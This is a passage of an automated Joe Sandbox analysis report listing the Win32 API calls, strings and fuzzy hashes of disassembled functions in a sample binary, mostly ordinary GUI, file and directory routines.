                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00905055
                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00905060
                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 0090506B
                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00905076
                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00905081
                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0090508C
                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00905097
                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 009050A2
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 009050AD
                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 009050B8
                                                                        • GetCursorInfo.USER32(?), ref: 009050C8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$Load$Info
                                                                        • String ID:
                                                                        • API String ID: 2577412497-0
                                                                        • Opcode ID: 72688663e31c30d42318236964984a585e57cf5a7a433960f9f7c1a985ab90ac
                                                                        • Instruction ID: cb1d8bb7a1764bd6b68a2a0e5b05f987c55c3c97e2e2f0b8f2def3428dddd3a2
                                                                        • Opcode Fuzzy Hash: 72688663e31c30d42318236964984a585e57cf5a7a433960f9f7c1a985ab90ac
                                                                        • Instruction Fuzzy Hash: 2431E2B1D483196ADF109FB68C899AFBEECFB04750F50452AE50DE7280DA78A5008F95
                                                                        APIs
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 008EA47A
                                                                        • _wcscmp.LIBCMT ref: 008EA52E
                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008EA583
                                                                        • _wcscmp.LIBCMT ref: 008EA5BF
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 008EA5F6
                                                                        • GetDlgCtrlID.USER32(?), ref: 008EA648
                                                                        • GetWindowRect.USER32(?,?), ref: 008EA67E
                                                                        • GetParent.USER32(?), ref: 008EA69C
                                                                        • ScreenToClient.USER32(00000000), ref: 008EA6A3
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 008EA71D
                                                                        • _wcscmp.LIBCMT ref: 008EA731
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 008EA757
                                                                        • _wcscmp.LIBCMT ref: 008EA76B
                                                                          • Part of subcall function 008B362C: _iswctype.LIBCMT ref: 008B3634
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_iswctype
                                                                        • String ID: %s%u
                                                                        • API String ID: 1635473695-679674701
                                                                        • Opcode ID: d26aa8904a1c1a06fd8c2d586754f4155a75e6c4b4954cd67dccfe0a59321a09
                                                                        • Instruction ID: 0cdd56e80474e5d72b425186fba50749cddb4fa6c6f6144861a42246591e76a6
                                                                        • Opcode Fuzzy Hash: d26aa8904a1c1a06fd8c2d586754f4155a75e6c4b4954cd67dccfe0a59321a09
                                                                        • Instruction Fuzzy Hash: 33A1D131204246AFDB18DF65C884BEAB7E8FF56B54F008629F999D2190DB30F945CB92
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0091A259
                                                                        • DestroyWindow.USER32(?,?), ref: 0091A2D3
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0091A34D
                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0091A36F
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0091A382
                                                                        • DestroyWindow.USER32(00000000), ref: 0091A3A4
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00890000,00000000), ref: 0091A3DB
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0091A3F4
                                                                        • GetDesktopWindow.USER32 ref: 0091A40D
                                                                        • GetWindowRect.USER32(00000000), ref: 0091A414
                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0091A42C
                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0091A444
                                                                          • Part of subcall function 008925DB: GetWindowLongW.USER32(?,000000EB), ref: 008925EC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                        • String ID: 0$tooltips_class32
                                                                        • API String ID: 1297703922-3619404913
                                                                        • Opcode ID: b6550bb2a633d3783cf46de1f9632da3d3fc651ba8b7b4ef4dcfd5d0ca2474f5
                                                                        • Instruction ID: 339faa18886dee550c1cef991a576b3a6bc8c9c869967b6de04ea77cd2ad959e
                                                                        • Opcode Fuzzy Hash: b6550bb2a633d3783cf46de1f9632da3d3fc651ba8b7b4ef4dcfd5d0ca2474f5
                                                                        • Instruction Fuzzy Hash: 1E717970254208AFDB21DF28CC59FAA7BE9FB88304F04492CF985872B1D770AD46DB52
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • DragQueryPoint.SHELL32(?,?), ref: 0091C627
                                                                          • Part of subcall function 0091AB37: ClientToScreen.USER32(?,?), ref: 0091AB60
                                                                          • Part of subcall function 0091AB37: GetWindowRect.USER32(?,?), ref: 0091ABD6
                                                                          • Part of subcall function 0091AB37: PtInRect.USER32(?,?,?), ref: 0091ABE6
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0091C690
                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0091C69B
                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0091C6BE
                                                                        • _wcscat.LIBCMT ref: 0091C6EE
                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0091C705
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0091C71E
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0091C735
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0091C757
                                                                        • DragFinish.SHELL32(?), ref: 0091C75E
                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0091C851
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                        • API String ID: 169749273-3440237614
                                                                        • Opcode ID: a8b1e2da3eec16d50abaf8929e2653842f7e228cb7ea54be2fa05004274a1622
                                                                        • Instruction ID: 37dc5ecc6a108d929620c4549ada5b064dde9d6cc7ff83c96020ed5e385128c7
                                                                        • Opcode Fuzzy Hash: a8b1e2da3eec16d50abaf8929e2653842f7e228cb7ea54be2fa05004274a1622
                                                                        • Instruction Fuzzy Hash: F4618D71208305AFCB01EF68DC95EAFBBE8FF89354F00492EF595921A1DB709949CB52
                                                                        APIs
                                                                        • __set_osfhnd.LIBCMT ref: 008C8184
                                                                          • Part of subcall function 008BD52A: SetStdHandle.KERNEL32(000000F6,008C8189,00000001,0091FB24,00000000,?,008C8189,0091FB24,00000040,?,?,?,?,?,00000000,00000109), ref: 008BD57D
                                                                        • __lseeki64_nolock.LIBCMT ref: 008C81EE
                                                                          • Part of subcall function 008B8AF4: __getptd_noexit.LIBCMT ref: 008B8AF4
                                                                        • __close_nolock.LIBCMT ref: 008C8214
                                                                          • Part of subcall function 008C0ADD: CloseHandle.KERNELBASE(00000000,0091FB24,00000000,?,008C8219,0091FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008C0B2D
                                                                          • Part of subcall function 008C0ADD: GetLastError.KERNEL32(?,008C8219,0091FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008C0B37
                                                                          • Part of subcall function 008C0ADD: __free_osfhnd.LIBCMT ref: 008C0B44
                                                                          • Part of subcall function 008C0ADD: __dosmaperr.LIBCMT ref: 008C0B66
                                                                        • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 008C851A
                                                                        • ___createFile.LIBCMT ref: 008C8539
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008C8546
                                                                        • __dosmaperr.LIBCMT ref: 008C854D
                                                                        • __free_osfhnd.LIBCMT ref: 008C856D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$CloseErrorLast__dosmaperr__free_osfhnd$File___create__close_nolock__getptd_noexit__lseeki64_nolock__set_osfhnd
                                                                        • String ID: @$t"=$t"=$t)=$t)=$tD=
                                                                        • API String ID: 3527355902-3051076874
                                                                        • Opcode ID: ac3f8c35fb3130faaf79a81f19cace89e38915cf49394ff3d900c9d5db0c811b
                                                                        • Instruction ID: 10dc418ed0c1c7aba287de0bd3767a4c980401e5e7fb0f9869cc19774258512f
                                                                        • Opcode Fuzzy Hash: ac3f8c35fb3130faaf79a81f19cace89e38915cf49394ff3d900c9d5db0c811b
                                                                        • Instruction Fuzzy Hash: F3512131954646CBDB298B18E895FAD7B31FB05310F28422DE961EB2E2CB76CD40D745
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 00914424
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0091446F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                         • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                        • API String ID: 3974292440-4258414348
                                                                        • Opcode ID: c946f8f887bcc08850dd2141c8e45b6416b7b2cc17efbc33f7769d75d74741ae
                                                                        • Instruction ID: b68e37cf24051e80d78825881edfb490bf4e36f75956f07efbe377893a952e76
                                                                        • Opcode Fuzzy Hash: c946f8f887bcc08850dd2141c8e45b6416b7b2cc17efbc33f7769d75d74741ae
                                                                        • Instruction Fuzzy Hash: 5F915D702043159BCB14EF18C451AAEB7E5FF99354F14486CF896AB3A2DB34ED49CB82
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0091B8B4
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00916B11,?), ref: 0091B910
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0091B949
                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0091B98C
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0091B9C3
                                                                        • FreeLibrary.KERNEL32(?), ref: 0091B9CF
                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0091B9DF
                                                                        • DestroyIcon.USER32(?), ref: 0091B9EE
                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0091BA0B
                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0091BA17
                                                                          • Part of subcall function 008B2EFD: __wcsicmp_l.LIBCMT ref: 008B2F86
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                         • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                        • String ID: .dll$.exe$.icl
                                                                        • API String ID: 1212759294-1154884017
                                                                        • Opcode ID: d0736e2685fed07aa08bd46115c20bc505a84f5b78bc54881a4350b453aa855b
                                                                        • Instruction ID: bbacea4f0b94af80cce8a2a3c78b81f8d89e5a7e22a3007c09e86c31e4e8721f
                                                                        • Opcode Fuzzy Hash: d0736e2685fed07aa08bd46115c20bc505a84f5b78bc54881a4350b453aa855b
                                                                        • Instruction Fuzzy Hash: 1261D071A00219BAEB14DF68CC45FFE7BACFB08724F108619FA15D61D1DB749981DBA0
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?), ref: 008FDCDC
                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 008FDCEC
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008FDCF8
                                                                        • __wsplitpath.LIBCMT ref: 008FDD56
                                                                        • _wcscat.LIBCMT ref: 008FDD6E
                                                                        • _wcscat.LIBCMT ref: 008FDD80
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008FDD95
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FDDA9
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FDDDB
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FDDFC
                                                                        • _wcscpy.LIBCMT ref: 008FDE08
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008FDE47
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                         • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                        • String ID: *.*
                                                                        • API String ID: 3566783562-438819550
                                                                        • Opcode ID: 74728f1d414eb2b3d180d81e93d55cc5a2988e021fabad0bd65d4b1c167fae80
                                                                        • Instruction ID: 69eaeb4409439a1c3e0a60933458785886ffe89dcaaa5862a4c0bb9df48c9d47
                                                                        • Opcode Fuzzy Hash: 74728f1d414eb2b3d180d81e93d55cc5a2988e021fabad0bd65d4b1c167fae80
                                                                        • Instruction Fuzzy Hash: 0D617B725043099FCB10EF28C8459AEB3E9FF89314F04892DFA99D7251EB35E945CB92
                                                                        APIs
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        • CharLowerBuffW.USER32(?,?), ref: 008FA3CB
                                                                        • GetDriveTypeW.KERNEL32 ref: 008FA418
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008FA460
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008FA497
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008FA4C5
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                         • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$BuffCharDriveLowerType__itow_memmove
                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                        • API String ID: 1157065533-4113822522
                                                                        • Opcode ID: c6456753c6c1fc74f2ca5629c99a806a4e773aeea8f225ed105ebca95f4fb23b
                                                                        • Instruction ID: efac152987757c0a7fd881d0367be4adb7441b852c25819a6263ca1fa60ac612
                                                                        • Opcode Fuzzy Hash: c6456753c6c1fc74f2ca5629c99a806a4e773aeea8f225ed105ebca95f4fb23b
                                                                        • Instruction Fuzzy Hash: 84514B711143059FCB04EF28C89196FB7E4FF98728F14886DF89A97261DB71AD09CB52
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0091BA56
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0091BA6D
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0091BA78
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0091BA85
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0091BA8E
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0091BA9D
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0091BAA6
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0091BAAD
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0091BABE
                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00922CAC,?), ref: 0091BAD7
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0091BAE7
                                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 0091BB0B
                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0091BB36
                                                                        • DeleteObject.GDI32(00000000), ref: 0091BB5E
                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0091BB74
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                         • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                        • String ID:
                                                                        • API String ID: 3840717409-0
                                                                        • Opcode ID: 34fcbaab7c45d1903bebf73c8a9eeb514f49407af909f515c3b66b182a6fe3d2
                                                                        • Instruction ID: 8ca63294a18e0daa84d859029360fd55551b1c5f87c27f207ede501e3fe4fc3d
                                                                        • Opcode Fuzzy Hash: 34fcbaab7c45d1903bebf73c8a9eeb514f49407af909f515c3b66b182a6fe3d2
                                                                        • Instruction Fuzzy Hash: 5D413475604208FFDB119F65DC98EEABBB9EF89711F108068F91AD7260D7309A41EB60
                                                                        APIs
                                                                        • __wsplitpath.LIBCMT ref: 008FDA10
                                                                        • _wcscat.LIBCMT ref: 008FDA28
                                                                        • _wcscat.LIBCMT ref: 008FDA3A
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008FDA4F
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FDA63
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 008FDA7B
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 008FDA95
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FDAA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                         • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                        • String ID: *.*
                                                                        • API String ID: 34673085-438819550
                                                                        • Opcode ID: 7dfdd073b875f81b9c5360550ad39540d36457a3d74bae4c6b64e36305dd61e8
                                                                        • Instruction ID: 8773e309ad92527367eea184df136319a7c49e16b8bf6cfc6ec7a79bd222d5d1
                                                                        • Opcode Fuzzy Hash: 7dfdd073b875f81b9c5360550ad39540d36457a3d74bae4c6b64e36305dd61e8
                                                                        • Instruction Fuzzy Hash: 7681B5726043099FCB20EF78C8449BABBE5FF89354F18882EF689C7251E670D945CB52
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0091C1FC
                                                                        • GetFocus.USER32 ref: 0091C20C
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0091C217
                                                                        • _memset.LIBCMT ref: 0091C342
                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0091C36D
                                                                        • GetMenuItemCount.USER32(?), ref: 0091C38D
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0091C3A0
                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0091C3D4
                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0091C41C
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0091C454
                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?), ref: 0091C489
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                         • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1296962147-4108050209
                                                                        • Opcode ID: dd650232dffabff0edc1d9ee1743528a4642d91401ca564103747c9ee878282c
                                                                        • Instruction ID: 7aaa4a854a93e35372a6541281787bfb8de0d739b20ed51524069ee053404a73
                                                                        • Opcode Fuzzy Hash: dd650232dffabff0edc1d9ee1743528a4642d91401ca564103747c9ee878282c
                                                                        • Instruction Fuzzy Hash: 8381AEB0348319AFD710CF14C894ABBBBE9FB88754F00492DF995972A1D730D985DB92
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0090738F
                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0090739B
                                                                        • CreateCompatibleDC.GDI32(?), ref: 009073A7
                                                                        • SelectObject.GDI32(00000000,?), ref: 009073B4
                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00907408
                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00907444
                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00907468
